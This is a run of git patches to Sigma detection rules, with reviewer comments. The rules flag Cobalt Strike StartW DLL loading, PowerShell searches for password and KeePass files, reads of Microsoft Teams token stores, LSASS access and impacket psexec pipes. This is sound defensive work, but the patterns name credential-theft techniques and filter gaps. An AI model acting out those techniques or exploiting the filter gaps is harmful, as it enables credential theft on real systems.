+modified: 2022/09/16 description: Rundll32 can be use by Cobalt Strike with StartW function to load DLLs from the command line. references: - https://www.cobaltstrike.com/help-windows-executable 
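Review bot: filter_ngen's `Image|startswith: 'C:\Windows\Microsoft.NET\Framework'` is a bare prefix: dropping the trailing backslash to cover `Framework64\` also admits any sibling directory whose name merely starts with `Framework`. The `Image|endswith: '\ngen.exe'` clause limits the practical exposure, but listing both real prefixes is just as short and makes the inline comment unnecessary: `Image|startswith:` / `- 'C:\Windows\Microsoft.NET\Framework\'` / `- 'C:\Windows\Microsoft.NET\Framework64\'`.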
@@ -16,14 +16,18 @@ logsource: category: process_creation product: windows detection: - selection: - CommandLine|contains|all: + selection_rundll: + - Image|endswith: '\rundll32.exe' + - OriginalFileName: RUNDLL32.EXE + - CommandLine|contains: - 'rundll32.exe' - - '.dll' + - 'rundll32 ' + selection_params: + CommandLine|contains: '.dll' CommandLine|endswith: - ' StartW' - ',StartW' - condition: selection + condition: all of selection* falsepositives: - Unknown level: high From 4ede1b413fa2f50d5a9509454d47054b43b26544 Mon Sep 17 00:00:00 2001 From: Borna Talebi <49802660+bornatalebi@users.noreply.github.com> Date: Fri, 16 Sep 2022 21:46:45 +0430 Subject: [PATCH 043/120] Update reference --- .../powershell_module/posh_pm_alternate_powershell_hosts.yml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/rules/windows/powershell/powershell_module/posh_pm_alternate_powershell_hosts.yml b/rules/windows/powershell/powershell_module/posh_pm_alternate_powershell_hosts.yml index 3fc16fea8..85ad15559 100644 --- a/rules/windows/powershell/powershell_module/posh_pm_alternate_powershell_hosts.yml +++ b/rules/windows/powershell/powershell_module/posh_pm_alternate_powershell_hosts.yml @@ -6,7 +6,7 @@ date: 2019/08/11 modified: 2022/04/21 author: Roberto Rodriguez @Cyb3rWard0g references: - - https://threathunterplaybook.com/notebooks/windows/02_execution/WIN-190815181010.html + - https://threathunterplaybook.com/hunts/windows/190610-PwshAlternateHosts/notebook.html tags: - attack.execution - attack.t1059.001 @@ -30,4 +30,4 @@ falsepositives: - Programs using PowerShell directly without invocation of a dedicated interpreter - MSP Detection Searcher - Citrix ConfigSync.ps1 -level: medium \ No newline at end of file +level: medium From c78b332ba7bb0c7f50248f770edb4349081d696b Mon Sep 17 00:00:00 2001 
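Review bot: `- OriginalFileName: RUNDLL32.EXE` in selection_rundll is the only unquoted string value in the hunk while every neighbour is single-quoted; `- OriginalFileName: 'RUNDLL32.EXE'` keeps the style uniform and guards against YAML re-typing if the value ever changes. A list of maps (OR) directly next to a plain map (AND) is easy to misread, so one comment above each new selection would help, e.g. `# any of: image name, PE original name, or command line mention` above selection_rundll and `# all of: a .dll argument and a StartW export` above selection_params.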
From: frack113 <62423083+frack113@users.noreply.github.com> Date: Fri, 16 Sep 2022 19:37:26 +0200 Subject: [PATCH 044/120] Add posh_ps_sensitive_file_discovery --- .../posh_ps_sensitive_file_discovery.yml | 34 +++++++++++++++++++ 1 file changed, 34 insertions(+) create mode 100644 rules/windows/powershell/powershell_script/posh_ps_sensitive_file_discovery.yml diff --git a/rules/windows/powershell/powershell_script/posh_ps_sensitive_file_discovery.yml b/rules/windows/powershell/powershell_script/posh_ps_sensitive_file_discovery.yml new file mode 100644 index 000000000..b4a5a05cd --- /dev/null +++ b/rules/windows/powershell/powershell_script/posh_ps_sensitive_file_discovery.yml @@ -0,0 +1,34 @@ +title: Powershell Sensitive File Discovery +id: 7d416556-6502-45b2-9bad-9d2f05f38997 +related: + - id: d23f2ba5-9da0-4463-8908-8ee47f614bb9 + type: derived +description: Detect adversaries enumerate sensitive files +references: + - https://twitter.com/malmoeb/status/1570814999370801158 +status: experimental +author: frack113 +date: 2022/09/16 +logsource: + product: windows + category: ps_script + definition: Script block logging must be enabled +detection: + selection_action: + ScriptBlockText|contains: + - ls + - get-childitem + - gci + selection_recurse: + ScriptBlockText|contains: '-recurse' + selection_file: + ScriptBlockText|contains: + - 'pass' + - 'kdbx' + condition: all of selection_* +falsepositives: + - Unknown +level: medium +tags: + - attack.discovery + - attack.t1083 From 2cd376c70cae25e8213b4cfc702e2c7beedb6458 Mon Sep 17 00:00:00 2001 From: frack113 <62423083+frack113@users.noreply.github.com> Date: Fri, 16 Sep 2022 20:04:55 +0200 Subject: [PATCH 045/120] fix pass --- .../powershell_script/posh_ps_sensitive_file_discovery.yml | 5 +++-- 1 file changed, 3 insertions(+), 2 deletions(-) 
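Review bot: `- ls` in selection_action is a two-character substring match over the whole script block, so it also hits `else`, `false`, `$results` and similar tokens and makes that selection nearly always true; the actual discrimination then rests on `-recurse` and the file tokens alone. If the alias is wanted, bound it (`- ' ls '`) or use `ScriptBlockText|re: '\bls\b'`, and quote the three values like the ones in selection_file. The description also needs a grammar fix: `Detects adversaries enumerating sensitive files`.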
diff --git a/rules/windows/powershell/powershell_script/posh_ps_sensitive_file_discovery.yml b/rules/windows/powershell/powershell_script/posh_ps_sensitive_file_discovery.yml index b4a5a05cd..5815a0ca6 100644 --- a/rules/windows/powershell/powershell_script/posh_ps_sensitive_file_discovery.yml +++ b/rules/windows/powershell/powershell_script/posh_ps_sensitive_file_discovery.yml @@ -23,8 +23,9 @@ detection: ScriptBlockText|contains: '-recurse' selection_file: ScriptBlockText|contains: - - 'pass' - - 'kdbx' + - '.pass' + - '.kdbx' + - '.kdb' condition: all of selection_* falsepositives: - Unknown From 8afb971e207a4dd85b06c0835a1cc8e9cf7089c6 Mon Sep 17 00:00:00 2001 From: Yamato Security <71482215+YamatoSecurity@users.noreply.github.com> Date: Sat, 17 Sep 2022 07:46:31 +0900 Subject: [PATCH 046/120] update application uninstalled rule --- .../builtin/application/win_builtin_remove_application.yml | 7 ++++--- 1 file changed, 4 insertions(+), 3 deletions(-) diff --git a/rules/windows/builtin/application/win_builtin_remove_application.yml b/rules/windows/builtin/application/win_builtin_remove_application.yml index 3209074b4..1a497e2b6 100644 --- a/rules/windows/builtin/application/win_builtin_remove_application.yml +++ b/rules/windows/builtin/application/win_builtin_remove_application.yml @@ -1,9 +1,10 @@ -title: An Application Is Uninstall +title: Application Uninstalled id: 570ae5ec-33dc-427c-b815-db86228ad43e status: experimental -description: An application have been remove check if it is a critical +description: An application has been removed. Check if it is critical. author: frack113 date: 2022/01/28 +modified: 2022/09/17 logsource: product: windows service: application @@ -16,7 +17,7 @@ detection: condition: selection falsepositives: - Unknown -level: low +level: informational tags: - attack.impact - attack.t1489 From 8b60317e2e42d23b579a612a7017e2fdda8ab1d0 Mon Sep 17 00:00:00 2001 
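Review bot: With the `contains` modifier `'.kdb'` already matches every `'.kdbx'` occurrence, so the `- '.kdbx'` entry is redundant after this change; either drop it or add `# .kdb also covers .kdbx` so nobody "fixes" it later. `'.pass'` remains a fairly broad token (it matches `.Password`-style property accesses as well as file names), which the `falsepositives: Unknown` entry does not reflect.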
From: tr0mb1r Date: Sat, 17 Sep 2022 10:47:35 +0400 Subject: [PATCH 047/120] Microsoft Teams Suspicious ObjectAccess events (#3500) --- .../win_teams_suspicious_objectaccess.yml | 27 +++++++++++++++++++ .../file_event_win_access_susp_teams.yml | 26 ++++++++++++++++++ ...ms_suspicious_command_line_cred_access.yml | 26 ++++++++++++++++++ 3 files changed, 79 insertions(+) create mode 100644 rules/windows/builtin/security/win_teams_suspicious_objectaccess.yml create mode 100644 rules/windows/file_event/file_event_win_access_susp_teams.yml create mode 100644 rules/windows/process_creation/proc_creation_win_teams_suspicious_command_line_cred_access.yml diff --git a/rules/windows/builtin/security/win_teams_suspicious_objectaccess.yml b/rules/windows/builtin/security/win_teams_suspicious_objectaccess.yml new file mode 100644 index 000000000..e19c134ff --- /dev/null +++ b/rules/windows/builtin/security/win_teams_suspicious_objectaccess.yml @@ -0,0 +1,27 @@ +title: Suspicious Teams Application Related ObjectAcess Event +id: 25cde13e-8e20-4c29-b949-4e795b76f16f +status: experimental +description: Detects an access to authentication tokens and accounts of Microsoft Teams desktop application. +author: '@SerkinValery' +references: + - https://www.bleepingcomputer.com/news/security/microsoft-teams-stores-auth-tokens-as-cleartext-in-windows-linux-macs/ + - https://www.vectra.ai/blogpost/undermining-microsoft-teams-security-by-mining-tokens +date: 2022/09/16 +logsource: + product: windows + service: security +detection: + selection: + EventID: 4663 + ObjectName|contains: + - '\Microsoft\Teams\Cookies' + - '\Microsoft\Teams\Local Storage\leveldb' + filter: + ProcessName|contains: '\Microsoft\Teams\current\Teams.exe' + condition: selection and not filter +falsepositives: + - Unknown +level: high +tags: + - attack.credential_access + - attack.t1528 
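Review bot: EventID 4663 is only generated for objects that carry a matching SACL, so the selection is silent unless file-system object-access auditing is enabled on the Teams `Cookies` and `Local Storage\leveldb` paths; the logsource block should say so, e.g. `definition: Requires 'Audit File System' and a SACL on the Microsoft Teams profile directories`. The filter uses `ProcessName|contains` for a full executable path where `endswith` is the precise modifier (`ProcessName|endswith: '\Microsoft\Teams\current\Teams.exe'`); the same applies to `Image|contains` in the filters of file_event_win_access_susp_teams.yml and proc_creation_win_teams_suspicious_command_line_cred_access.yml in this commit. Title typo: `ObjectAcess` → `ObjectAccess`.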
diff --git a/rules/windows/file_event/file_event_win_access_susp_teams.yml b/rules/windows/file_event/file_event_win_access_susp_teams.yml new file mode 100644 index 000000000..332a8a19c --- /dev/null +++ b/rules/windows/file_event/file_event_win_access_susp_teams.yml @@ -0,0 +1,26 @@ +title: Suspicious File Event With Teams Objects +id: 6902955a-01b7-432c-b32a-6f5f81d8f624 +status: experimental +description: Detects an access to authentication tokens and accounts of Microsoft Teams desktop application. +author: '@SerkinValery' +references: + - https://www.bleepingcomputer.com/news/security/microsoft-teams-stores-auth-tokens-as-cleartext-in-windows-linux-macs/ + - https://www.vectra.ai/blogpost/undermining-microsoft-teams-security-by-mining-tokens +date: 2022/09/16 +logsource: + product: windows + category: file_event +detection: + selection: + TargetFilename|contains: + - '\Microsoft\Teams\Cookies' + - '\Microsoft\Teams\Local Storage\leveldb' + filter: + Image|contains: '\Microsoft\Teams\current\Teams.exe' + condition: selection and not filter +falsepositives: + - Unknown +level: high +tags: + - attack.credential_access + - attack.t1528 diff --git a/rules/windows/process_creation/proc_creation_win_teams_suspicious_command_line_cred_access.yml b/rules/windows/process_creation/proc_creation_win_teams_suspicious_command_line_cred_access.yml new file mode 100644 index 000000000..3c0eb326c --- /dev/null +++ b/rules/windows/process_creation/proc_creation_win_teams_suspicious_command_line_cred_access.yml 
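Review bot: Sigma's `file_event` category covers file-creation telemetry (Sysmon EventID 11 and the like), not reads, so the description `Detects an access to authentication tokens …` overstates what this rule observes: as far as the category allows, it fires when a process other than Teams.exe creates or overwrites files under those paths. Reword it to what is actually matched, e.g. `Detects creation or modification of the Microsoft Teams token store files by a process other than Teams.exe`; read access to the cookie database is the job of the 4663-based rule in this commit.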
@@ -0,0 +1,26 @@ +title: Suspicious Command With Teams Objects Pathes +id: d2eb17db-1d39-41dc-b57f-301f6512fa75 +status: experimental +description: Detects an access to authentication tokens and accounts of Microsoft Teams desktop application. +author: '@SerkinValery' +references: + - https://www.bleepingcomputer.com/news/security/microsoft-teams-stores-auth-tokens-as-cleartext-in-windows-linux-macs/ + - https://www.vectra.ai/blogpost/undermining-microsoft-teams-security-by-mining-tokens +date: 2022/09/16 +logsource: + product: windows + category: process_creation +detection: + selection: + CommandLine|contains: + - '\Microsoft\Teams\Cookies' + - '\Microsoft\Teams\Local Storage\leveldb' + filter: + Image|contains: '\Microsoft\Teams\current\Teams.exe' + condition: selection and not filter +falsepositives: + - Unknown +level: high +tags: + - attack.credential_access + - attack.t1528 From 9f6604cf819a619dd615c2f4771d15aacf782d20 Mon Sep 17 00:00:00 2001 From: Florian Roth Date: Sun, 18 Sep 2022 09:41:51 +0200 Subject: [PATCH 048/120] fix: aurora mtach calltrace msedeg.exe --- .../proc_access_win_direct_syscall_ntopenprocess.yml | 4 +++- 1 file changed, 3 insertions(+), 1 deletion(-) diff --git a/rules/windows/process_access/proc_access_win_direct_syscall_ntopenprocess.yml b/rules/windows/process_access/proc_access_win_direct_syscall_ntopenprocess.yml index c449009b1..7faa0f832 100755 --- a/rules/windows/process_access/proc_access_win_direct_syscall_ntopenprocess.yml +++ b/rules/windows/process_access/proc_access_win_direct_syscall_ntopenprocess.yml @@ -6,7 +6,7 @@ references: status: experimental author: Christian Burkard, Tim Shelton date: 2021/07/28 -modified: 2022/08/09 +modified: 2022/09/18 logsource: category: process_access product: windows 
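Review bot: Title typo: `Pathes` → `Paths`. The description is copied verbatim from the two sibling rules although this one inspects command lines rather than access; `Detects command lines referencing the Microsoft Teams token store paths` states what the selection matches. Since a path quoted on a command line is neither necessarily an access nor the only way to reach the files, `falsepositives: Unknown` could name the obvious case: `Backup or cleanup scripts referencing the Teams profile directory`.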
@@ -32,6 +32,8 @@ detection: falsepositive6: TargetImage|endswith: 'C:\Program Files\Mozilla Firefox\firefox.exe' SourceImage|endswith: 'C:\Program Files\Mozilla Firefox\firefox.exe' + falsepositive_kerneltrace_edge: # Cases in which the CallTrace is just e.g. 'UNKNOWN(19290435374)' from Microsoft-Windows-Kernel-Audit-API-Calls provider + CallTrace|endswith: ')' condition: selection and not 1 of falsepositive* falsepositives: - Unknown From 2da0554bedc5f3066064c1f61b318939edb33687 Mon Sep 17 00:00:00 2001 From: Florian Roth Date: Sun, 18 Sep 2022 09:57:04 +0200 Subject: [PATCH 049/120] fix: temporarily disable Kernel-Audit-API-Calls --- .../proc_access_win_direct_syscall_ntopenprocess.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/rules/windows/process_access/proc_access_win_direct_syscall_ntopenprocess.yml b/rules/windows/process_access/proc_access_win_direct_syscall_ntopenprocess.yml index 7faa0f832..e1587a4f6 100755 --- a/rules/windows/process_access/proc_access_win_direct_syscall_ntopenprocess.yml +++ b/rules/windows/process_access/proc_access_win_direct_syscall_ntopenprocess.yml @@ -33,7 +33,7 @@ detection: TargetImage|endswith: 'C:\Program Files\Mozilla Firefox\firefox.exe' SourceImage|endswith: 'C:\Program Files\Mozilla Firefox\firefox.exe' falsepositive_kerneltrace_edge: # Cases in which the CallTrace is just e.g. 'UNKNOWN(19290435374)' from Microsoft-Windows-Kernel-Audit-API-Calls provider - CallTrace|endswith: ')' + Provider_Name: 'Microsoft-Windows-Kernel-Audit-API-Calls' condition: selection and not 1 of falsepositive* falsepositives: - Unknown From 2e8717d603ce7727240bbcec4d9f36285263052e Mon Sep 17 00:00:00 2001 From: Florian Roth Date: Sun, 18 Sep 2022 10:39:56 +0200 Subject: [PATCH 050/120] fix: taskhostw FPs with lsass access --- rules/windows/builtin/security/win_susp_lsass_dump_generic.yml | 3 +++ 1 file changed, 3 insertions(+) 
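Review bot: After the second hunk the filter keys on `Provider_Name`, but the selection name `falsepositive_kerneltrace_edge` and its inline comment still describe a CallTrace shape, so the stated rationale no longer matches the code. Update the comment to the new logic, e.g. `# Events from the Microsoft-Windows-Kernel-Audit-API-Calls provider carry no usable CallTrace (e.g. 'UNKNOWN(19290435374)'), so they are excluded by provider`, and consider renaming the selection to `falsepositive_kernel_audit_provider` (the `1 of falsepositive*` condition still covers it). The first hunk's `CallTrace|endswith: ')'` is superseded by the second and needs no separate change.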
diff --git a/rules/windows/builtin/security/win_susp_lsass_dump_generic.yml b/rules/windows/builtin/security/win_susp_lsass_dump_generic.yml index 824d0f1ec..b462d8e29 100644 --- a/rules/windows/builtin/security/win_susp_lsass_dump_generic.yml +++ b/rules/windows/builtin/security/win_susp_lsass_dump_generic.yml @@ -70,6 +70,9 @@ detection: ProcessName|startswith: 'C:\Program Files' # too many false positives with legitimate AV and EDR solutions filter3: ProcessName: 'C:\Windows\CCM\CcmExec.exe' + filter4: + ProcessName: 'C:\Windows\System32\taskhostw.exe' + AccessMask: '0x10' condition: 1 of selection_* and not 1 of filter* fields: - ComputerName From 34957a784b16dd1ab3be976c3bcd0ff344c9d966 Mon Sep 17 00:00:00 2001 From: Florian Roth Date: Sun, 18 Sep 2022 10:42:19 +0200 Subject: [PATCH 051/120] fix: modified date update --- rules/windows/builtin/security/win_susp_lsass_dump_generic.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/rules/windows/builtin/security/win_susp_lsass_dump_generic.yml b/rules/windows/builtin/security/win_susp_lsass_dump_generic.yml index b462d8e29..0942e28b4 100644 --- a/rules/windows/builtin/security/win_susp_lsass_dump_generic.yml +++ b/rules/windows/builtin/security/win_susp_lsass_dump_generic.yml @@ -4,7 +4,7 @@ description: Detects process handle on LSASS process with certain access mask status: experimental author: Roberto Rodriguez, Teymur Kheirkhabarov, Dimitrios Slamaris, Mark Russinovich, Aleksey Potapov, oscd.community (update) date: 2019/11/01 -modified: 2022/04/29 +modified: 2022/09/18 references: - https://cyberwardog.blogspot.com/2017/03/chronicles-of-threat-hunter-hunting-for_22.html - https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment From 34d7ad03f7d7059a815ead1669694a62e2d38842 Mon Sep 17 00:00:00 2001 
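Review bot: filter4 has no comment explaining why `taskhostw.exe` with `AccessMask: '0x10'` is excluded, while filter2 a few lines up documents its false-positive reason; without it the next maintainer cannot tell a deliberate exclusion from a copy-paste. Propose `# taskhostw.exe opening lsass with PROCESS_VM_READ (0x10) only; benign per 2e8717d` on the filter4 line.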
From: Florian Roth Date: Sun, 18 Sep 2022 12:54:37 +0200 Subject: [PATCH 052/120] fix: FPs noticed with Aurora --- rules/windows/dns_query/dns_query_win_susp_ldap.yml | 4 +++- .../powershell_module/posh_pm_alternate_powershell_hosts.yml | 4 +++- .../proc_access_win_rare_proc_access_lsass.yml | 5 ++++- 3 files changed, 10 insertions(+), 3 deletions(-) diff --git a/rules/windows/dns_query/dns_query_win_susp_ldap.yml b/rules/windows/dns_query/dns_query_win_susp_ldap.yml index accfaf6e3..5f0998042 100644 --- a/rules/windows/dns_query/dns_query_win_susp_ldap.yml +++ b/rules/windows/dns_query/dns_query_win_susp_ldap.yml @@ -3,7 +3,7 @@ id: a21bcd7e-38ec-49ad-b69a-9ea17e69509e description: Detect suspicious ldap request from non Windows application status: experimental date: 2022/08/20 -modified: 2022/09/08 +modified: 2022/09/18 author: frack113 references: - https://github.com/redcanaryco/atomic-red-team/blob/40b77d63808dd4f4eafb83949805636735a1fd15/atomics/T1482/T1482.md @@ -20,6 +20,8 @@ detection: Image|endswith: '\MsMpEng.exe' filter_unknown: Image: '' + filter_azure: + Image|startswith: 'C:\WindowsAzure\GuestAgent' condition: dns_request and not 1 of filter_* falsepositives: - Programs that also lookup the observed domain diff --git a/rules/windows/powershell/powershell_module/posh_pm_alternate_powershell_hosts.yml b/rules/windows/powershell/powershell_module/posh_pm_alternate_powershell_hosts.yml index 3fc16fea8..7b7d84390 100644 --- a/rules/windows/powershell/powershell_module/posh_pm_alternate_powershell_hosts.yml +++ b/rules/windows/powershell/powershell_module/posh_pm_alternate_powershell_hosts.yml 
@@ -3,7 +3,7 @@ id: 64e8e417-c19a-475a-8d19-98ea705394cc description: Detects alternate PowerShell hosts potentially bypassing detections looking for powershell.exe status: test date: 2019/08/11 -modified: 2022/04/21 +modified: 2022/09/18 author: Roberto Rodriguez @Cyb3rWard0g references: - https://threathunterplaybook.com/notebooks/windows/02_execution/WIN-190815181010.html @@ -25,6 +25,8 @@ detection: ContextInfo|contains: 'C:\Windows\system32\dsac.exe' filter_winrm: ContextInfo|contains: 'C:\Windows\system32\wsmprovhost.exe -Embedding' + filter_help_update: + Payload|contains: 'Update-Help' condition: selection and not 1 of filter* falsepositives: - Programs using PowerShell directly without invocation of a dedicated interpreter diff --git a/rules/windows/process_access/proc_access_win_rare_proc_access_lsass.yml b/rules/windows/process_access/proc_access_win_rare_proc_access_lsass.yml index 51c980f05..26a7bf029 100644 --- a/rules/windows/process_access/proc_access_win_rare_proc_access_lsass.yml +++ b/rules/windows/process_access/proc_access_win_rare_proc_access_lsass.yml @@ -7,7 +7,7 @@ status: experimental description: Detects process access to LSASS memory with suspicious access flags 0x410 and 0x01410 (spin-off of similar rule) author: Florian Roth date: 2022/03/13 -modified: 2022/08/13 +modified: 2022/09/18 references: - https://docs.microsoft.com/en-us/windows/win32/procthread/process-security-and-access-rights - https://onedrive.live.com/view.aspx?resid=D026B4699190F1E6!2843&ithint=file%2cpptx&app=PowerPoint&authkey=!AMvCRTKB_V1J5ow @@ -92,6 +92,9 @@ detection: - '\MBAMInstallerService.exe' - '\WebEx\WebexHost.exe ' - '\Programs\Microsoft VS Code\Code.exe' + filter_xampp: + SourceImage|endswith: '\xampp-control.exe' + GrantedAccess: '0x410' condition: selection and not 1 of filter* fields: - User From 1c4a73f123cd584f0f43fff57086f0aff2693e4f Mon Sep 17 00:00:00 2001 
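Review bot: filter_help_update keys on `Payload|contains: 'Update-Help'`, which excludes any module-logging event whose script content contains that token, whereas the other filters in this rule (`dsac.exe`, `wsmprovhost.exe -Embedding`) anchor on the host process via ContextInfo. Because the payload text is authored by whoever runs the script, a content-based exclusion is far broader than a host-based one; restrict it to the host that produced the false positive, e.g. `filter_help_update:` / `ContextInfo|contains: '<observed host path — TODO fill in>'` / `Payload|contains: 'Update-Help'`, and record the observed FP in falsepositives.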
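Review bot: filter_xampp pairs `SourceImage|endswith: '\xampp-control.exe'` with `GrantedAccess: '0x410'`, one of the exact masks the rule description says it hunts, and the name match carries no directory component, unlike most neighbouring entries (`\WebEx\WebexHost.exe`, `\Programs\Microsoft VS Code\Code.exe`). Anchoring it as `SourceImage|endswith: '\xampp\xampp-control.exe'` keeps the exclusion tied to the XAMPP install directory rather than to a file name alone. Separately, the context line `'\WebEx\WebexHost.exe '` two lines above the new filter has a trailing space inside the quotes, so that endswith entry can never match an image path; the commit leaves it as is.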
From: Florian Roth Date: Sun, 18 Sep 2022 12:56:52 +0200 Subject: [PATCH 053/120] fix: FP with PS ISE --- .../image_load/image_load_wsman_provider_image_load.yml | 4 +++- 1 file changed, 3 insertions(+), 1 deletion(-) diff --git a/rules/windows/image_load/image_load_wsman_provider_image_load.yml b/rules/windows/image_load/image_load_wsman_provider_image_load.yml index 1ce9ae1f7..846ebbbbb 100644 --- a/rules/windows/image_load/image_load_wsman_provider_image_load.yml +++ b/rules/windows/image_load/image_load_wsman_provider_image_load.yml @@ -3,7 +3,7 @@ id: ad1f4bb9-8dfb-4765-adb6-2a7cfb6c0f94 description: Detects signs of potential use of the WSMAN provider from uncommon processes locally and remote execution. status: experimental date: 2020/06/24 -modified: 2022/07/18 +modified: 2022/09/18 author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research) tags: - attack.execution @@ -55,6 +55,8 @@ detection: Image|startswith: 'C:\Windows\Temp\asgard2-agent\' filter_citrix: Image|startswith: 'C:\Program Files\Citrix\' + filter_ps_ise: + Image|endswith: '\powershell_ise.exe' svchost: Image|endswith: '\svchost.exe' commandline_null: From 17e9b5ee31390541f306777b9fb9d44835606d01 Mon Sep 17 00:00:00 2001 From: Arturo <101707527+amjcyber@users.noreply.github.com> Date: Sun, 18 Sep 2022 15:38:54 +0200 Subject: [PATCH 054/120] Update win_impacket_psexec.yml Based on recent tests, the original RelativeTargetName from this rule are not accurate. The last "t" from each selection must be deleted in order to detect the predefined impacket psexec behavior. --- rules/windows/builtin/security/win_impacket_psexec.yml | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/rules/windows/builtin/security/win_impacket_psexec.yml b/rules/windows/builtin/security/win_impacket_psexec.yml index 036a3b101..ff7856880 100644 --- a/rules/windows/builtin/security/win_impacket_psexec.yml +++ b/rules/windows/builtin/security/win_impacket_psexec.yml 
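Review bot: filter_ps_ise excludes on `Image|endswith: '\powershell_ise.exe'` alone, whereas the neighbouring `filter_citrix` and asgard entries anchor on a full `Image|startswith` path. A name-only suffix match exempts any binary carrying that file name wherever it resides; since PowerShell ISE ships under `WindowsPowerShell\v1.0\`, `Image|endswith: '\WindowsPowerShell\v1.0\powershell_ise.exe'` keeps the exclusion to the system install. The rule's falsepositives list (outside the hunk) should also mention ISE now that it is filtered.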
@@ -16,9 +16,9 @@ detection: EventID: 5145 ShareName: '\\\\\*\\IPC$' # looking for the string \\*\IPC$ RelativeTargetName|contains: - - 'RemCom_stdint' - - 'RemCom_stdoutt' - - 'RemCom_stderrt' + - 'RemCom_stdin' + - 'RemCom_stdout' + - 'RemCom_stderr' condition: selection1 falsepositives: - Unknown From bf660b2de26c9f50aa7b5f4ab424d536fa2fd480 Mon Sep 17 00:00:00 2001 From: Florian Roth Date: Sun, 18 Sep 2022 16:21:05 +0200 Subject: [PATCH 055/120] fix: FPs (testing, and Windows 2022 test system) --- .../win_scm_database_privileged_operation.yml | 4 ++-- ...ile_event_win_webshell_creation_detect.yml | 21 ++++++++----------- ..._win_shell_write_susp_files_extensions.yml | 3 ++- ...ion_win_ntfs_short_name_path_use_image.yml | 13 +++++++++--- ...creation_win_ntfs_short_name_use_image.yml | 6 ++++-- .../proc_creation_win_susp_gup_execution.yml | 7 ++++++- ...c_creation_win_susp_regsvr32_anomalies.yml | 4 +++- ..._creation_win_susp_schtasks_env_folder.yml | 6 ++++-- .../registry_event_susp_atbroker_change.yml | 8 +++---- .../registry_set_add_port_monitor.yml | 9 +++++++- ...gistry_set_disable_autologger_sessions.yml | 5 ++++- .../registry_set_new_network_provider.yml | 5 ++++- 12 files changed, 60 insertions(+), 31 deletions(-) diff --git a/rules/windows/builtin/security/win_scm_database_privileged_operation.yml b/rules/windows/builtin/security/win_scm_database_privileged_operation.yml index ed9b84694..7141e95ce 100644 --- a/rules/windows/builtin/security/win_scm_database_privileged_operation.yml +++ b/rules/windows/builtin/security/win_scm_database_privileged_operation.yml @@ -6,7 +6,7 @@ author: Roberto Rodriguez @Cyb3rWard0g, Tim Shelton references: - https://threathunterplaybook.com/notebooks/windows/07_discovery/WIN-190826010110.html date: 2019/08/15 -modified: 2022/06/30 +modified: 2022/09/18 logsource: product: windows service: security 
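Review bot: the corrected values `RemCom_stdin`/`RemCom_stdout`/`RemCom_stderr` are used with `RelativeTargetName|contains`, but nothing in the rule records why a substring match is needed, and the `modified:` date (outside the hunk) is not bumped although every other rule edit in this series does so. A short comment would stop the next reader from tightening it to an exact match, e.g. `RelativeTargetName|contains: # pipe names carry a host/pid suffix, so substring match is required — TODO confirm against current impacket`. The commit message cites "recent tests" but the hunk adds no reference for the tested behaviour; adding one under references would make the change auditable.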
@@ -22,7 +22,7 @@ detection: condition: selection and not filter falsepositives: - Unknown -level: high +level: medium tags: - attack.privilege_escalation - attack.t1548 diff --git a/rules/windows/file_event/file_event_win_webshell_creation_detect.yml b/rules/windows/file_event/file_event_win_webshell_creation_detect.yml index eda1ef802..ba9948640 100755 --- a/rules/windows/file_event/file_event_win_webshell_creation_detect.yml +++ b/rules/windows/file_event/file_event_win_webshell_creation_detect.yml @@ -6,37 +6,34 @@ author: Beyu Denis, oscd.community, Tim Shelton references: - PT ESC rule and personal experience date: 2019/10/22 -modified: 2022/05/24 +modified: 2022/09/18 logsource: product: windows category: file_event detection: - selection_2: + selection_wwwroot: TargetFilename|contains: '\inetpub\wwwroot\' - selection_3: + selection_ext1: TargetFilename|contains: - '.asp' - '.ashx' - '.ph' - selection_4: + selection_static: TargetFilename|contains: - '\www\' - '\htdocs\' - '\html\' - selection_5: + selection_ext2: TargetFilename|contains: '.ph' - selection_6: - - TargetFilename|endswith: '.jsp' - - TargetFilename|contains|all: - - '\cgi-bin\' - - '.pl' false_positive1: # false positives when unpacking some executables in $TEMP TargetFilename|contains: - '\AppData\Local\Temp\' - '\Windows\Temp\' - false_positive2: + false_positive_system: Image: 'System' # fp : backup/restore from drivers - condition: not false_positive2 and ( (selection_2 and selection_3 and not false_positive1) or (selection_4 and selection_5 and not false_positive1) or (selection_6 and not false_positive1) ) + false_positive_legitimate: + TargetFilename|comntains: '\xampp' + condition: ((selection_wwwroot and selection_ext1) or (selection_static and selection_ext2)) and not 1 of false_positive* falsepositives: - Legitimate administrator or developer creating legitimate executable files in a web application folder level: high 
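Review bot: level is lowered from high to medium while the falsepositives entry two lines above stays `- Unknown`; the commit message says the change is driven by false positives seen in testing, so the observed source should be recorded there, e.g. replace `- Unknown` with `- <legitimate source observed in testing — TODO record>`. Lowering severity without documenting the FP leaves future reviewers unable to judge whether the downgrade is still warranted.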
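Review bot: the new `false_positive_legitimate` excludes any `TargetFilename` containing `\xampp`, and XAMPP's web root is `\xampp\htdocs\`, so on XAMPP hosts this cancels the `selection_static` (`\htdocs\`) plus `.ph` pair the rule relies on; narrow it to the location that actually produced the FP (e.g. `TargetFilename|contains: '\xampp\tmp\'` if that is what was observed) rather than the whole tree. The hunk also silently drops `selection_6` (`.jsp` and `\cgi-bin\` + `.pl`), reducing coverage without a mention in the commit message or in the rule description outside the hunk. The modifier typo `comntains` is corrected by PATCH 057 later in this series.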
